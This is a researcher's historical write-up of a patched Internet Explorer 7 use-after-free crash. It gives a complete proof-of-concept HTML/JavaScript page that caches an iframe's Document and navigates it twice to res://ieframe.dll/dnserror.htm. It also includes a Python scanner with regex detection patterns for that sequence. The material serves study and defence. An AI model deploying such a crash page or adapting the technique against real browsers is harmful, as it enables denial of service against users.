I was applying the cached-Document technique to IE’s internal res:// protocol URLs — specifically res://ieframe.dll/dnserror.htm, the DNS error page. After caching the Document of an SWF-loaded iframe and then navigating the cached document’s parentWindow to that res:// URL twice in succession, the browser crashed. It was a targeted variant of the same cached-document use-after-free class, this time triggered specifically by the internal error page renderer.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>DoS_IE7_swf_ResProtocol</title></head>
<body>
<font face="Tahoma" size="2">
<center><h2>DoS_IE7_swf_ResProtocol</h2></center>
<center>
<input type="button" value="Do It!" onclick="loadItTwice()"><br />
(And wait 5 seconds because we have to load the swf inside the IFRAME, cache its <b>D</b>ocument, and change the URL of the IFRAME twice.)
</center>
<hr />
1) Load any <font color="blue"><b>swf</b></font> inside an IFRAME.<br />

<font color="red">window[0]</font>.location.replace('<font color="blue">empty.swf</font>');<br /><br />

2) Cache the <font color="blue"><b>D</b></font>ocument of the IFRAME in the <b>cachedDocument</b> variable.<br />
<font color="blue">cachedDocument</font> = document.all.flashContainer.<font color="blue"><b>D</b></font>ocument;<br /><br />
3) Change the URL of the IFRAME.<br />
window[0].location = "<font color="blue">about:blank</font>";<br /><br />

4) Change location of the cached <font color="blue"><b>D</b></font>ocument.<br />
<font color="blue"><b>cachedDocument</b>.parentWindow.location</font> = 'res://ieframe.dll/dnserror.htm';<br /><br />

5) Change location of the cached <font color="blue"><b>D</b></font>ocument again, and it will crash the Browser.<br />
<font color="blue"><b>cachedDocument</b>.parentWindow.location</font> = 'res://ieframe.dll/dnserror.htm';<br /><br />

<hr />
<br />
<center>
	<iframe id="flashContainer" width="100" height="100"></iframe>
</center>
</font>


<script language="JavaScript">
var cachedDocument; // holds the IFRAME's Document (IE's capital-D property) once the swf is loaded
function loadItTwice()
{
	// 1) Load the swf inside the IFRAME.
	window[0].location.replace('empty.swf');

	// 2) Cache the IFRAME's Document after the swf has had time to load.
	setTimeout('cachedDocument = document.all.flashContainer.Document;', 1000);

	// 3) Change the URL of the IFRAME; cachedDocument now refers to stale state.
	setTimeout('window[0].location = "about:blank";', 2000);
	// 4) and 5) Navigate the cached Document's parentWindow to the res:// error page twice; the second one crashes.
	setTimeout('cachedDocument.parentWindow.location = "res://ieframe.dll/dnserror.htm";', 3000);
	setTimeout('cachedDocument.parentWindow.location = "res://ieframe.dll/dnserror.htm";', 5000);
}
</script>
</body>
</html>

The sequence loads a SWF into an iframe, caches its Document object, navigates the iframe to about:blank (which partially invalidates the cached reference), then directs the cached document’s parentWindow.location to res://ieframe.dll/dnserror.htm — an internal IE resource. The first navigation to the res:// URL may partially succeed; the second navigation two seconds later hits an already-modified internal state and causes a crash. The res:// protocol handler appears to have had a different lifecycle from normal URL handlers, making it a reliable trigger for this particular fault.
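As an added defender-side example (not part of the original PoC or any product), a small Python scanner that flags inline scripts showing the full chain described above: caching an iframe's capital-D Document, navigating the iframe away, then assigning the cached document's parentWindow.location to a res:// URL. The indicator patterns and both sample pages are constructed for this illustration; a benign page that only calls window.location.replace is not flagged.

```python
import re

# Three indicators, one per step of the crash sequence described above.
# Constructed patterns for this illustration; they match the PoC's own
# statements rather than forming a general IE signature.
INDICATORS = {
    "cache_iframe_document": re.compile(r"\.Document\b"),  # IE's capital-D property
    "navigate_iframe_away": re.compile(r"window\[\d+\]\.location\s*=|\.location\.replace\("),
    "reuse_cached_window": re.compile(r"\.parentWindow\.location\s*=\s*['\"]res://", re.I),
}

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)


def extract_scripts(html):
    """Return the bodies of all inline <script> blocks in an HTML document."""
    return SCRIPT_RE.findall(html)


def scan_page(html):
    """Return the set of indicator names found in the page's inline scripts."""
    found = set()
    for body in extract_scripts(html):
        for name, pattern in INDICATORS.items():
            if pattern.search(body):
                found.add(name)
    return found


def is_suspicious(html):
    """Flag only when the whole cache -> navigate -> reuse chain is present and
    the reuse targets res://; any single indicator is common in benign pages."""
    return scan_page(html) == set(INDICATORS)


# Constructed samples: a minimal copy of the page's own sequence, and a benign
# page that only performs an ordinary window.location.replace().
POC_PAGE = """<html><body><iframe id="flashContainer"></iframe>
<script language="JavaScript">
var cachedDocument;
window[0].location.replace('empty.swf');
setTimeout('cachedDocument = document.all.flashContainer.Document;', 1000);
setTimeout('window[0].location = "about:blank";', 2000);
setTimeout('cachedDocument.parentWindow.location = "res://ieframe.dll/dnserror.htm";', 3000);
</script></body></html>"""

BENIGN_PAGE = """<html><body><script>
if (!sessionStorage.getItem('seen')) { window.location.replace('/welcome.html'); }
</script></body></html>"""
```

Requiring all three indicators keeps false positives down: ordinary redirects and IE-era `.Document` accesses each trip one pattern, but only the reuse of a cached document's parentWindow against a res:// URL completes the chain.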

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.